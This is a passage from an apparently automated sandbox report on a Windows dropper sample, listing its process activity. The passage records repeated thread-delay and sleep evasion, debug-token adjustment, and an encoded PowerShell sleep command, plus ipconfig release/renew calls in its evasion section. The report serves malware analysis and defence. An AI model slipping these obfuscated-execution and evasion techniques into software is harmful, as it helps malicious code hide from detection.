              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe TID: 160Thread sleep count: 196 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5308Thread sleep count: 7601 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4624Thread sleep time: -14757395258967632s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5116Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2120Thread sleep time: -12912720851596678s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7601Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9150Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: powershell.exe, 00000001.00000002.438150424.0000000005311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
              Source: powershell.exe, 00000001.00000002.438150424.0000000005311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.429476801.0000000004EEB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Kl:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess created: Base64 decoded start-sleep -seconds 45
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess created: Base64 decoded start-sleep -seconds 45Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" Get-DateJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig/releaseJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANAA1AA==Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig/renewJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /releaseJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renewJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
